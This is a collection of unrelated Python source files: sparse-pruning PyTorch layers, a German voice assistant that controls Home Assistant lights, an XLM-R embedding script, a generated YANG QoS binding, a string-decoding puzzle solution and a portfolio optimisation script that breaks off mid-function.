weight_mask = update_mask_approx2(weight_temp,weight_mask,BS=M)
if absorb_mean:
output = output.reshape(-1, M*M).clone()
output+=output.mul(1-weight_mask).mean(1)
output=output.reshape(weight.shape)
weight.mask=weight_mask.reshape(weight.shape)
return output*weight.mask, weight.mask
@staticmethod
def backward(ctx, grad_output, _):
return grad_output, None, None, None, None, None
class Sparse(autograd.Function):
"""" Prune the unimprotant edges for the forwards phase but pass the gradient to dense weight using STE in the backwards phase"""
@staticmethod
def forward(ctx, weight, N, M):
output = weight.clone()
length = weight.numel()
group = int(length/M)
weight_temp = weight.detach().abs().reshape(group, M)
index = torch.argsort(weight_temp, dim=1)[:, :int(M-N)]
w_b = torch.ones(weight_temp.shape, device=weight_temp.device)
w_b = w_b.scatter_(dim=1, index=index, value=0).reshape(weight.shape)
return output*w_b, w_b
@staticmethod
def backward(ctx, grad_output, _):
return grad_output, None, None
class SparseTransposeV2(autograd.Function):
"""" Prune the unimprotant edges for the forwards phase but pass the gradient to dense weight using STE in the backwards phase"""
@staticmethod
def forward(ctx, weight, N, M, counter):
weight.mask = weight.mask.to(weight)
output = weight.reshape(-1, M*M).clone()
weight_mask = weight.mask.reshape(-1, M*M)
output+=torch.mean(output.mul(1-weight_mask),dim=1,keepdim=True)
weight.mask=weight_mask.reshape(weight.shape)
output=output.reshape(weight.shape)
return output*weight.mask, weight.mask
@staticmethod
def backward(ctx, grad_output, _):
return grad_output, None, None, None
class SparseConvTranspose(nn.Conv2d):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True, padding_mode='zeros', N=2, M=4, **kwargs):
self.N = N
self.M = M
self.counter = 0
self.freq = 1
self.absorb_mean = False
super(SparseConvTranspose, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias, padding_mode, **kwargs)
def get_sparse_weights(self):
return SparseTranspose.apply(self.weight, self.N, self.M, self.counter, self.freq, self.absorb_mean)
def forward(self, x):
if self.training:
self.counter+=1
self.freq = 40 #min(self.freq+self.counter//100,100)
w, mask = self.get_sparse_weights()
setattr(self.weight, "mask", mask)
else:
w = self.weight * self.weight.mask
x = F.conv2d(
x, w, self.bias, self.stride, self.padding, self.dilation, self.groups
)
return x
class SparseConvTransposeV2(nn.Conv2d):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True, padding_mode='zeros', N=2, M=4, **kwargs):
self.N = N
self.M = M
self.counter = 0
self.freq = 1
self.rerun_ip = 0.01
self.ipClass = PruningMethodTransposableBlockL1(block_size=self.M, topk=self.N)
super(SparseConvTransposeV2, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias, padding_mode, **kwargs)
def get_sparse_weights(self):
with torch.no_grad():
weight_temp = self.weight.detach().abs().reshape(-1, self.M*self.M)
weight_mask = self.weight.mask.detach().reshape(-1, self.M*self.M)
num_samples_ip= int(self.rerun_ip*weight_temp.shape[0])
idx=torch.randperm(weight_temp.shape[0])[:num_samples_ip]
sample_weight = weight_temp[idx]
mask_new = self.ipClass.compute_mask(sample_weight,torch.ones_like(sample_weight))
weight_mask = weight_mask.to(self.weight.device)
weight_mask[idx]=mask_new.to(self.weight.device)
return SparseTransposeV2.apply(self.weight, self.N, self.M, self.counter)
def forward(self, x):
# self.counter+=1
# self.freq = min(self.freq+self.counter//100,100)
w, mask = self.get_sparse_weights()
setattr(self.weight, "mask", mask)
x = F.conv2d(
x, w, self.bias, self.stride, self.padding, self.dilation, self.groups
)
return x
class SparseConv(nn.Conv2d):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True, padding_mode='zeros', N=2, M=4, **kwargs):
self.N = N
self.M = M
super(SparseConv, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias, padding_mode, **kwargs)
def get_sparse_weights(self):
return Sparse.apply(self.weight, self.N, self.M)
def forward(self, x):
w, mask = self.get_sparse_weights()
setattr(self.weight, "mask", mask)
x = F.conv2d(
x, w, self.bias, self.stride, self.padding, self.dilation, self.groups
)
return x
class SparseLinear(nn.Linear):
def __init__():
self.N = N
self.M = M
class SparseLinearTranspose(nn.Linear):
def __init__(self, in_channels, out_channels, bias=True, N=2, M=4, **kwargs):
self.N = N
self.M = M
self.counter = 0
self.freq = 10
super(SparseLinearTranspose, self).__init__(in_channels, out_channels, bias,)
def get_sparse_weights(self):
return SparseTranspose.apply(self.weight, self.N, self.M, self.counter, self.freq, False)
def forward(self, x):
if self.training:
self.counter += 1
self.freq = 40 # min(self.freq+self.counter//100,100)
w, mask = self.get_sparse_weights()
setattr(self.weight, "mask", mask)
else:
w = self.weight * self.weight.mask
x = F.linear(
x, w, self.bias
)
return x
|
#!/usr/bin/env python3
import queue
from typing import Callable
import sounddevice as sd
import vosk
import sys
import json
import requests
import random
import configparser
from assistant import Assistant
from command import Command, CommandError
API_URL = None
TOKEN = None
q = queue.Queue()
def callback(indata, frames, time, status):
"""This is called (from a separate thread) for each audio block."""
if status:
print(status, file=sys.stderr)
q.put(bytes(indata))
def api_request(path: str, data: str) -> Callable:
def func():
res = requests.post(f"{API_URL}{path}",
data=str(data), headers={"Authorization": f"Bearer {TOKEN}"})
if res.status_code < 200 or res.status_code >= 300:
raise CommandError
return func
def handle_input(text: str, engine):
print(text)
text = text.strip().lower()
if "mach clemens lampe an" in text:
res = requests.post(f"{API_URL}/api/services/light/turn_on",
data='{"entity_id": "light.clemens_lampe"}', headers={"Authorization": f"Bearer {TOKEN}"})
if res.status_code >= 200 and res.status_code <= 300:
engine.say("Okeh.")
engine.runAndWait()
if "mach clemens lampe aus" in text:
res = requests.post(f"{API_URL}/api/services/light/turn_off",
data='{"entity_id": "light.clemens_lampe"}', headers={"Authorization": f"Bearer {TOKEN}"})
if res.status_code >= 200 and res.status_code <= 300:
engine.say("Okeh.")
engine.runAndWait()
if "mach ronja lampe an" in text:
res = requests.post(f"{API_URL}/api/services/light/turn_on",
data='{"entity_id": "light.ronjas_lampe"}', headers={"Authorization": f"Bearer {TOKEN}"})
if res.status_code >= 200 and res.status_code <= 300:
engine.say("Okeh.")
engine.runAndWait()
if "mach ronja lampe aus" in text:
res = requests.post(f"{API_URL}/api/services/light/turn_off",
data='{"entity_id": "light.ronjas_lampe"}', headers={"Authorization": f"Bearer {TOKEN}"})
if res.status_code >= 200 and res.status_code <= 300:
engine.say("Okeh.")
engine.runAndWait()
if "mach das licht an" in text:
res = requests.post(f"{API_URL}/api/services/light/turn_on",
data='{"entity_id": ["light.clemens_lampe", "light.ronjas_lampe"]}', headers={"Authorization": f"Bearer {TOKEN}"})
if res.status_code >= 200 and res.status_code <= 300:
engine.say("Okeh.")
engine.runAndWait()
if "mach das licht aus" in text:
res = requests.post(f"{API_URL}/api/services/light/turn_off",
data='{"entity_id": ["light.clemens_lampe", "light.ronjas_lampe"]}', headers={"Authorization": f"Bearer {TOKEN}"})
if res.status_code >= 200 and res.status_code <= 300:
engine.say("Okeh.")
engine.runAndWait()
if "singe mir ein lied" in text:
engine.say("la la la.")
engine.runAndWait()
if "wirf einen würfel" in text:
die = random.randint(1, 6)
engine.say(f"Das Ergebnis ist {die}")
engine.runAndWait()
def roll_d6():
die = random.randint(1, 6)
return f"Das Ergebnis ist {die}"
def phrases():
"""Returns recognized phrases until `KeyboardInterrupt` """
device_info = sd.query_devices(None, 'input')
print(device_info)
samplerate = int(device_info['default_samplerate'])
model = vosk.Model("model")
with sd.RawInputStream(samplerate=samplerate, blocksize=8000, dtype='int16',
channels=1, callback=callback):
rec = vosk.KaldiRecognizer(model, samplerate)
try:
while True:
data = q.get()
if rec.AcceptWaveform(data):
text = json.loads(rec.Result())["text"]
# handle_input(text, engine)
yield text
else:
res = rec.PartialResult()
print(f'Partial: {json.loads(res)["partial"]}')
except KeyboardInterrupt:
print("Done")
def main():
global API_URL
global TOKEN
config = configparser.ConfigParser()
config.read("config.ini")
API_URL = config["HomeAssistant"]["API_URL"]
TOKEN = config["HomeAssistant"]["TOKEN"]
assistant = Assistant()
assistant.add_command(Command("mach clemens lampe an", api_request(
"/api/services/light/turn_on", '{"entity_id": "light.clemens_lampe"}')))
assistant.add_command(Command("mach clemens lampe aus", api_request(
"/api/services/light/turn_off", '{"entity_id": "light.clemens_lampe"}')))
assistant.add_command(Command("wirf einen würfel", roll_d6))
assistant.add_command(Command("singe mir ein lied", lambda: "la la la"))
assistant.run(phrases())
if __name__ == "__main__":
main()
|
# Get sentence representations
"""
Sentences have to be in the BPE format, i.e. tokenized sentences on which you applied fastBPE.
Below you can see an example for English, French, Spanish, German, Arabic and Chinese sentences.
"""
########################################################
############ Testing on simple examples ################
#########################################################
from transformers import XLMRobertaModel
from transformers import XLMRobertaTokenizer
import torch
from keras.preprocessing.sequence import pad_sequences
import numpy as np
from tqdm import tqdm
import argparse
import gc
parser = argparse.ArgumentParser(description='Getting sentence embeddings with XLM. ')
parser.add_argument('--max_len', type=int, default=40,
help='Maximum length of tokens: all sentences with less tokens will be padded with 0, else we will remove all tokens after max_len index')
parser.add_argument('--pooling_strat',type=str, default='cls',
help='Pooling strategy to use to get sentence embeddings for last hidden layer')
args = parser.parse_args()
MAX_LEN = args.max_len
POOL_STRAT = args.pooling_strat
if POOL_STRAT == 'mean':
print('Using mean pooling strategy...')
if POOL_STRAT == 'cls':
print('Using CLS pooling strategy...')
class XLM_R_model:
"""
from here: https://github.com/huggingface/pytorch-transformers/blob/a2d4950f5c909f7bb4ea7c06afa6cdecde7e8750/pytorch_transformers/modeling_xlm.py
We can see all the possible models existing for XLM.
We focus on MLM+TLM which is the model that best performance on cross-lingual tasks.
"""
XLM_PRETRAINED_MODEL_ARCHIVE_MAP = {
'xlm-mlm-en-2048': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-en-2048-pytorch_model.bin",
'xlm-mlm-ende-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-ende-1024-pytorch_model.bin",
'xlm-mlm-enfr-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enfr-1024-pytorch_model.bin",
'xlm-mlm-enro-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enro-1024-pytorch_model.bin",
'xlm-mlm-tlm-xnli15-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-tlm-xnli15-1024-pytorch_model.bin",
'xlm-mlm-xnli15-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-xnli15-1024-pytorch_model.bin",
'xlm-clm-enfr-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-clm-enfr-1024-pytorch_model.bin",
'xlm-clm-ende-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-clm-ende-1024-pytorch_model.bin",
'xlm-mlm-17-1280': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-17-1280-pytorch_model.bin",
'xlm-mlm-100-1280': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-100-1280-pytorch_model.bin",
}
def __init__(self, model_name):
# @TODO: check what causal refers again
# model = XLMModel.from_pretrained("xlm-mlm-enfr-1024", causal = False)
self.model_name = model_name
self.model = XLMRobertaModel.from_pretrained(model_name)
self.tokenizer = XLMRobertaTokenizer.from_pretrained(self.model_name, do_lower_case=True)
def encode(self, sentence: str, max_len: int):
########## For 15 languages ########
tokenizer = self.tokenizer
"""
from https://huggingface.co/transformers/_modules/transformers/tokenization_utils.html
truncation_strategy: string selected in the following options:
- 'longest_first' (default) Iteratively reduce the inputs sequence until the input is under max_length
starting from the longest one at each token (when there is a pair of input sequences)
- 'only_first': Only truncate the first sequence
- 'only_second': Only truncate the second sequence
- 'do_not_truncate': Does not truncate (raise an error if the input sequence is longer than max_length)
pad_to_max_length: if set to True, the returned sequences will be padded according to the model's padding side and
padding index, up to their max length. If no max length is specified, the padding is done up to the model's max length.
The tokenizer padding sides are handled by the class attribute `padding_side` which can be set to the following strings:
- 'left': pads on the left of the sequences
- 'right': pads on the right of the sequences
Defaults to False: no padding.
"""
# Actually the Padding is done with the ID = 1
# So all tokens with ids = 1 are just paddings
input_ids = torch.tensor(
tokenizer.encode(sentence, add_special_tokens=True, max_length=max_len, truncation_strategy="longest_first",
pad_to_max_length='right')).unsqueeze(0) # Batch size 1
# print("input ids")
# print(input_ids)
# outputs = self.model(input_ids)
# embed = outputs[0] # The last hidden-state is the first element of the output tuple
########### CREATE ATTENTION MASKS ###################
# This is just to apply attention on the part where there are actual tokens
# Tokens are all ids different from id = 1
ones = torch.ones((1, input_ids.shape[1]))
zeros = torch.zeros((1, input_ids.shape[1]))
attention_masks = torch.where(input_ids == 1, zeros, ones) # put zeros where paddings are, one otherwise
########## FORWARD TO GET EMBEDDINGS ##########
embeddings_tuple = self.model(input_ids=input_ids, attention_mask=attention_masks)
embeddings_ = embeddings_tuple[0]
# print(embeddings_)
# print(embeddings_.shape)
# print(embeddings_[:,0,:].shape)
if POOL_STRAT == 'cls':
embeddings_first_token_only = embeddings_[:, 0, :]
embeddings_arr = embeddings_first_token_only.cpu().detach().numpy()
# print(embeddings_arr.shape)
del embeddings_, embeddings_first_token_only, embeddings_tuple
elif POOL_STRAT == 'mean':
input_mask_expanded = attention_masks.unsqueeze(-1).expand(embeddings_.size()).float()
# print("Input masks")
# print(input_mask_expanded)
# print(input_mask_expanded.shape)
# print(embeddings_ * input_mask_expanded)
sum_embeddings = torch.sum(embeddings_ * input_mask_expanded, dim = 1)
sum_mask = input_mask_expanded.sum(1) # number of tokens in txt sequence
sum_mask = torch.clamp(sum_mask, min=1e-9)
embeddings_mean = sum_embeddings / sum_mask
embeddings_arr = embeddings_mean.cpu().detach().numpy()
# print(embeddings_arr.shape)
del embeddings_, embeddings_mean, embeddings_tuple
# free up ram
gc.collect()
return embeddings_arr
if __name__=='__main__':
# for length in newstest2012.tok.fr
# mean value = 26.6
# std value = 15.4
# max value = 145
# Load XLM model
XLM_model = XLM_R_model("xlm-roberta-large")
max_len = MAX_LEN
# Open file
lang_arr = ['cs', 'de', 'en', 'es', 'fr', 'ru']
# lang = "ru"
for lang in lang_arr:
# input_file_name = "../data/processed/wmt2012/newstest2012.tok.{}".format(lang)
input_file_name = "../dev/newstest2012.{}".format(lang)
arr_embed = []
with open(input_file_name, 'r') as file:
N_lines = 3003
with tqdm(total=N_lines) as pbar:
for line in file:
line = line.strip("\n")
# For each line get embedding
embed = XLM_model.encode(sentence = line, max_len = max_len)
arr_embed.append(embed)
pbar.update(1)
# Store embedding in an array
np_embed = np.array(arr_embed)
# save numpy array in memory
np.save(file = "../output/XLM_R/newstest2012.{}.embed".format(lang), arr = np_embed)
|
from ..suffixes import DerivationalSuffix
from ..transitions import Transition
from . import State
class DerivationalState(State):
def __init__(self, initialState, finalState, *suffixes):
super(DerivationalState, self).__init__(initialState, finalState, *suffixes)
def NextState(self, suffix):
if self.initialState:
return B
A = DerivationalState(True, False, *DerivationalSuffix.VALUES)
B = DerivationalState(False, True)
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
class qos(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-common-def - based on the path /routing-system/interface/ve/qos. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__dscp_cos','__dscp_mutation','__dscp_traffic_class',)
_yang_name = 'qos'
_rest_name = 'qos'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__dscp_mutation = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-Mutation map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)
self.__dscp_cos = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-cos", rest_name="dscp-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-to-CoS map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)
self.__dscp_traffic_class = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-to-Traffic-Class map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'routing-system', u'interface', u've', u'qos']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'interface', u'Ve', u'qos']
def _get_dscp_cos(self):
"""
Getter method for dscp_cos, mapped from YANG variable /routing_system/interface/ve/qos/dscp_cos (map-name-type)
"""
return self.__dscp_cos
def _set_dscp_cos(self, v, load=False):
"""
Setter method for dscp_cos, mapped from YANG variable /routing_system/interface/ve/qos/dscp_cos (map-name-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_dscp_cos is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_dscp_cos() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-cos", rest_name="dscp-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-to-CoS map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """dscp_cos must be of a type compatible with map-name-type""",
'defined-type': "brocade-qos-mls:map-name-type",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-cos", rest_name="dscp-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-to-CoS map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)""",
})
self.__dscp_cos = t
if hasattr(self, '_set'):
self._set()
def _unset_dscp_cos(self):
self.__dscp_cos = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-cos", rest_name="dscp-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-to-CoS map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)
def _get_dscp_mutation(self):
"""
Getter method for dscp_mutation, mapped from YANG variable /routing_system/interface/ve/qos/dscp_mutation (map-name-type)
"""
return self.__dscp_mutation
def _set_dscp_mutation(self, v, load=False):
"""
Setter method for dscp_mutation, mapped from YANG variable /routing_system/interface/ve/qos/dscp_mutation (map-name-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_dscp_mutation is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_dscp_mutation() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-Mutation map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """dscp_mutation must be of a type compatible with map-name-type""",
'defined-type': "brocade-qos-mls:map-name-type",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-Mutation map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)""",
})
self.__dscp_mutation = t
if hasattr(self, '_set'):
self._set()
def _unset_dscp_mutation(self):
self.__dscp_mutation = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-Mutation map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)
def _get_dscp_traffic_class(self):
"""
Getter method for dscp_traffic_class, mapped from YANG variable /routing_system/interface/ve/qos/dscp_traffic_class (map-name-type)
"""
return self.__dscp_traffic_class
def _set_dscp_traffic_class(self, v, load=False):
"""
Setter method for dscp_traffic_class, mapped from YANG variable /routing_system/interface/ve/qos/dscp_traffic_class (map-name-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_dscp_traffic_class is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_dscp_traffic_class() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-to-Traffic-Class map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """dscp_traffic_class must be of a type compatible with map-name-type""",
'defined-type': "brocade-qos-mls:map-name-type",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-to-Traffic-Class map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)""",
})
self.__dscp_traffic_class = t
if hasattr(self, '_set'):
self._set()
def _unset_dscp_traffic_class(self):
self.__dscp_traffic_class = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-to-Traffic-Class map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)
dscp_cos = __builtin__.property(_get_dscp_cos, _set_dscp_cos)
dscp_mutation = __builtin__.property(_get_dscp_mutation, _set_dscp_mutation)
dscp_traffic_class = __builtin__.property(_get_dscp_traffic_class, _set_dscp_traffic_class)
_pyangbind_elements = {'dscp_cos': dscp_cos, 'dscp_mutation': dscp_mutation, 'dscp_traffic_class': dscp_traffic_class, }
|
from collections import deque
class Solution:
def decodeString(self, s):
s1, s2 = [], []
s = [c for c in s]
q = deque(s)
alpha = [chr(c) for c in range(ord("a"), ord("z") + 1)]
open, close = ["["], ["]"]
prev_digit = False
while q:
node = q.popleft()
if node.isdigit() and prev_digit:
s1[-1] = s1[-1] + node
prev_digit = True
elif node.isdigit():
s1.append(node)
prev_digit = True
elif node in alpha or node in open:
s2.append(node)
prev_digit = False
elif node in close:
tmp = []
while s2:
char = s2.pop()
if char in open:
tmp = tmp[::-1]
break
else:
tmp.append(char)
mul = s1.pop()
s2 += tmp * int(mul)
return "".join(s2)
if __name__ == "__main__":
s = "3[a10[c]]"
obj = Solution()
ans = obj.decodeString(s)
print(ans)
|
import numpy as np
import cvxopt
from cvxopt import solvers
from cvxopt import matrix
from numpy.linalg import eigh
cvxopt.solvers.options['show_progress'] = True
cvxopt.solvers.options['maxiters'] = 1000000
cvxopt.solvers.options['abstol'] = 1e-14
cvxopt.solvers.options['reltol'] = 1e-14
srng = np.random.RandomState
eucn = np.linalg.norm
sqrt = np.sqrt
def linf(x):
return (np.max(np.abs(x)))
N = 500 # number of securities
K = 4 # number of factors
# seed for beta and other factor exposures
seed = np.random.randint(0,100000)
seed = 31877
fmrng = srng(seed)
ones = np.ones(N)
IN = np.diag(ones)
##########################################
# CONSTRUCT ONE FACTOR MODEL #
# Y = B X + Z #
##########################################
# factor volatilities and variances
fvol = fmrng.exponential(5, K) / 100
fvar = fvol**2
# specific variance
svol = fmrng.uniform(0, 100, N) / 100
svar = svol**2
# construct the factor matrix B
B = np.zeros((N,K))
for k in range(K):
cents = np.array([0, 1/4, 1/2, 3/4, 1])
disps = np.array([1/8, 1/4, 1/2, 3/4, 1])
cent = fmrng.choice(cents)
disp = fmrng.choice(disps)
sgn = fmrng.choice([-1.0, 1.0])
beta = fmrng.normal (sgn * cent, disp, N)
B[:,k] = beta
V = np.diag(fvar)
V_inv = np.diag(1.0 / fvar)
V_sqr = np.diag(sqrt(fvar))
V_inv_sqr = sqrt(V_inv)
Sigma = B @ V @ B.T + np.diag(svar)
# reorient B
# signs = 1.0 * (((B.T / svar) @ ones) < 0)
# B = B * (1 - 2*signs)
def ls_minvar():
M = B.T / svar
A = V_inv + M @ B
b = np.sum(M, 1)
theta = np.linalg.solve(A,b)
w = (1.0 - B @ theta) / svar
r = dict(x = w/sum(w))
r.update(w = w)
r.update(theta = theta)
return (r)
def phi(th):
w = np.maximum(0.0, ones - B @ th) / svar
return ( (B * fvar).T @ w )
def psi(th):
domg = 1.0 * (ones > B @ th) / svar
A = V_inv + (domg * B.T) @ B
b = B.T @ domg
theta = np.linalg.solve(A,b)
return (theta)
def ffp(t0):
th_old = t0 - np.inf
th_new = t0
# list of positions that are zero on each iteration
active_list = list()
it = 0
while (linf(th_new-th_old) > 1e-15):
it = it + 1
th_old = th_new
th_new = psi(th_old)
chi = 1.0 * (ones > B @ th_old)
idx = np.where(chi < 0.5)[0]
active_list.append(idx)
r = dict(ffp_it = it)
r.update(theta = th_new)
r.update(psi = psi(th_new))
r.update(phi = phi(th_new))
r.update(active_it = active_list)
return (r)
def ffp_ortho():
G = np.zeros((N,K))
om_old = -1.0*np.inf
om_new = np.zeros(K)
# list of positions that are zero on each iteration
active_list = list()
it = 0
while (linf(om_new - om_old) > 1e-15):
om_old = om_new
chi = 1.0 * (ones > G @ om_old)
Omg = np.diag(chi / svar)
idx = np.where(chi < 0.5)[0]
active_list.append(idx)
